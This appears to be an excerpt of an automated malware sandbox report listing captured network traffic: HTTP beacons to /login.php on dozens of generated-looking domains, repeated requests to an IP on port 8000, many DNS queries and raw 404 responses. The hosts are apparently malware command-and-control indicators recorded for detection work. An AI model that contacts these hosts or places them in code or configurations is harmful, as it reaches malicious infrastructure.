Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygynud.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731345917.6190825
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0425-1706-a2c8-02526792f211 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731345917.8924867
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficDNS traffic detected: DNS query: lykyjad.com
Source: global trafficDNS traffic detected: DNS query: vopybyt.com
Source: global trafficDNS traffic detected: DNS query: pujyjav.com
Source: global trafficDNS traffic detected: DNS query: puzywel.com
Source: global trafficDNS traffic detected: DNS query: qebytiq.com
Source: global trafficDNS traffic detected: DNS query: qeqyxov.com
Source: global trafficDNS traffic detected: DNS query: vofygum.com
Source: global trafficDNS traffic detected: DNS query: gadyfuh.com
Source: global trafficDNS traffic detected: DNS query: puvyxil.com
Source: global trafficDNS traffic detected: DNS query: purycap.com
Source: global trafficDNS traffic detected: DNS query: gahyhob.com
Source: global trafficDNS traffic detected: DNS query: qedynul.com
Source: global trafficDNS traffic detected: DNS query: vonypom.com
Source: global trafficDNS traffic detected: DNS query: pupybul.com
Source: global trafficDNS traffic detected: DNS query: lysynur.com
Source: global trafficDNS traffic detected: DNS query: vojyqem.com
Source: global trafficDNS traffic detected: DNS query: qekykev.com
Source: global trafficDNS traffic detected: DNS query: ganypih.com
Source: global trafficDNS traffic detected: DNS query: lymyxid.com
Source: global trafficDNS traffic detected: DNS query: volyqat.com
Source: global trafficDNS traffic detected: DNS query: pufymoq.com
Source: global trafficDNS traffic detected: DNS query: gaqycos.com
Source: global trafficDNS traffic detected: DNS query: pufygug.com
Source: global trafficDNS traffic detected: DNS query: vowycac.com
Source: global trafficDNS traffic detected: DNS query: lygygin.com
Source: global trafficDNS traffic detected: DNS query: lyryvex.com
Source: global trafficDNS traffic detected: DNS query: gacyryw.com
Source: global trafficDNS traffic detected: DNS query: puvytuq.com
Source: global trafficDNS traffic detected: DNS query: lyxywer.com
Source: global trafficDNS traffic detected: DNS query: qetyvep.com
Source: global trafficDNS traffic detected: DNS query: lyvytuj.com
Source: global trafficDNS traffic detected: DNS query: vojyjof.com
Source: global trafficDNS traffic detected: DNS query: gatyvyz.com
Source: global trafficDNS traffic detected: DNS query: qegyhig.com
Source: global trafficDNS traffic detected: DNS query: qekyqop.com
Source: global trafficDNS traffic detected: DNS query: lymysan.com
Source: global trafficDNS traffic detected: DNS query: gadyniw.com
Source: global trafficDNS traffic detected: DNS query: gahyqah.com
Source: global trafficDNS traffic detected: DNS query: puzylyp.com
Source: global trafficDNS traffic detected: DNS query: vofymik.com
Source: global trafficDNS traffic detected: DNS query: qexyryl.com
Source: global trafficDNS traffic detected: DNS query: lyxylux.com
Source: global trafficDNS traffic detected: DNS query: qexylup.com
Source: global trafficDNS traffic detected: DNS query: galykes.com
Source: global trafficDNS traffic detected: DNS query: volykyc.com
Source: global trafficDNS traffic detected: DNS query: pumypog.com
Source: global trafficDNS traffic detected: DNS query: vowydef.com
Source: global trafficDNS traffic detected: DNS query: gatyfus.com
Source: global trafficDNS traffic detected: DNS query: gacyzuz.com
Source: global trafficDNS traffic detected: DNS query: lyryfyd.com
Source: global trafficDNS traffic detected: DNS query: qegyqaq.com
Source: global trafficDNS traffic detected: DNS query: purydyv.com
Source: global trafficDNS traffic detected: DNS query: lyvyxor.com
Source: global trafficDNS traffic detected: DNS query: qetyfuv.com
Source: global trafficDNS traffic detected: DNS query: gaqydeb.com
Source: global trafficDNS traffic detected: DNS query: pumyxiv.com
Source: global trafficDNS traffic detected: DNS query: lygymoj.com
Source: global trafficDNS traffic detected: DNS query: vocyruk.com
Source: global trafficDNS traffic detected: DNS query: qeqysag.com
Source: global trafficDNS traffic detected: DNS query: vocyzit.com
Source: global trafficDNS traffic detected: DNS query: galyqaz.com
Source: global trafficDNS traffic detected: DNS query: lysyfyj.com
Source: global trafficDNS traffic detected: DNS query: vonyzuf.com
Source: global trafficDNS traffic detected: DNS query: qedyfyq.com
Source: global trafficDNS traffic detected: DNS query: qegynuv.com
Source: global trafficDNS traffic detected: DNS query: pupydeq.com
Source: global trafficDNS traffic detected: DNS query: puvylyg.com
Source: global trafficDNS traffic detected: DNS query: vocykem.com
Source: global trafficDNS traffic detected: DNS query: vopydek.com
Source: global trafficDNS traffic detected: DNS query: pujymip.com
Source: global trafficDNS traffic detected: DNS query: qetysal.com
Source: global trafficDNS traffic detected: DNS query: gahynus.com
Source: global trafficDNS traffic detected: DNS query: qebylug.com
Source: global trafficDNS traffic detected: DNS query: ganyzub.com
Source: global trafficDNS traffic detected: DNS query: lykymox.com
Source: global trafficDNS traffic detected: DNS query: lyrysor.com
Source: global trafficDNS traffic detected: DNS query: vojymic.com
Source: global trafficDNS traffic detected: DNS query: gatydaw.com
Source: global trafficDNS traffic detected: DNS query: lyvylyn.com
Source: global trafficDNS traffic detected: DNS query: pujygul.com
Source: global trafficDNS traffic detected: DNS query: volymum.com
Source: global trafficDNS traffic detected: DNS query: lymylyr.com
Source: global trafficDNS traffic detected: DNS query: gadydas.com
Source: global trafficDNS traffic detected: DNS query: puzymig.com
Source: global trafficDNS traffic detected: DNS query: vofydac.com
Source: global trafficDNS traffic detected: DNS query: qeqylyl.com
Source: global trafficDNS traffic detected: DNS query: qexyqog.com
Source: global trafficDNS traffic detected: DNS query: qegyfyp.com
Source: global trafficDNS traffic detected: DNS query: qekyhil.com
Source: global trafficDNS traffic detected: DNS query: gahyfyz.com
Source: global trafficDNS traffic detected: DNS query: vonyryc.com
Source: global trafficDNS traffic detected: DNS query: qexykaq.com
Source: global trafficDNS traffic detected: DNS query: pufybyv.com
Source: global trafficDNS traffic detected: DNS query: galyhiw.com
Source: global trafficDNS traffic detected: DNS query: pupycag.com
Source: global trafficDNS traffic detected: DNS query: gaqypiz.com
Source: global trafficDNS traffic detected: DNS query: vopycom.com
Source: global trafficDNS traffic detected: DNS query: lyxymin.com
Source: global trafficDNS traffic detected: DNS query: lygynud.com
Source: global trafficDNS traffic detected: DNS query: lykygur.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PyFL6VAvOnFvD1bpa9f8VdEyic%2BvDdTMGmG%2Ff6yfp2eUzAVR2fvsMKqGVEdJgJquHamRCnzfIMmKVtvLzXyhjUhto1zmOlB4yrE%2BB1YX5QpnxtM80JLE%2Fb8rS4C2GA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9ee4a2e183d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1231&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2149962&cwnd=250&unsent_bytes=0&cid=29c9b339551dce15&ts=1161&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:24:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ijf5A6dkhwJpd1g%2FqnVvyygdBKHgUgzjFFRiB9HeFb6jOqtSidGKZX1YIGosrAOb1%2FR2wsJPQ7QqrJ7fTGvX3nTtw8%2BYk8aHoDb5jm5L07pH3uVcVDlxLEJliTDIeg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ff9fa69a9a2db-YULalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=11393&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=254124&cwnd=32&unsent_bytes=0&cid=7fcd1c432caa2cca&ts=788&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:25:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="82.7",amp_style_sanitizer;dur="29.9",amp_tag_and_attribute_sanitizer;dur="39.8",amp_optimizer;dur="38.4"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnVbsvyJbXv35%2Fq2Vgc0nWpbkPaESsc7YhFuHeJTJK7z%2B8ulvwqV50phI%2BFyfyvkKL%2F%2BDJUV9cEEM3jYk%2BqCJIwq9xAm%2FxoECMpWOV6SDs2%2FHVfTCSsgD2V%2BPXW%2Fkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffaea3a396a50-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1708&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=881&delivery_rate=1641723&cwnd=251&unsent_bytes=0&cid=e91537255902d88c&ts=3073&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:25:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"server-timing: amp_sanitizer;dur="29.9",amp_style_sanitizer;dur="11.5",amp_tag_and_attribute_sanitizer;dur="14.2",amp_optimizer;dur="20.5"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GekztQz1A10OtUkahkdaGerJujXD1US1a88cVxhgD7dcdOoNjvD8%2FpY%2By%2FH6sfcDiDRn7zjM2sna4%2BQPnDaanJYj5dHHP7KWWr8v%2B7pBY60E%2FWMA4Jf85GYhZmKnrg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffb02ee5c43fe-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1336&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2220858&cwnd=244&unsent_bytes=0&cid=d104671925f2b1d9&ts=1703&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:25:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tWGvUWrHSqfbbgsWEl%2BGkY0QEjgyi7VA5B4jGXL3Ppw4ZV7Fivf0bRuvu4UtiRYRYIppUy79ePPjSaQEzGJ%2F0vj%2Bp0bNuTkEWjZQnBfmIAH74XFr2pnXk1MV6zwhQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffb65b9af5391-DENalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=46905&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=61831&cwnd=32&unsent_bytes=0&cid=8340e877fedd24c3&ts=709&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 17:25:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wk3mjjcLLNogo8n%2FO1NZ%2FzJH5m4jAys249E2LCauldADu%2FvW%2FcQTr%2BHNWp2PXJMY0JniZZsWuAK8mXNLH1Cv%2BK5gUiz5USEVlS5aBVev%2FgLNrC1PE4iDxizaupLXug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e0ffb704e748c57-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1296&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2214067&cwnd=251&unsent_bytes=0&cid=5ce8563c57c430c1&ts=1019&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:24:24 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 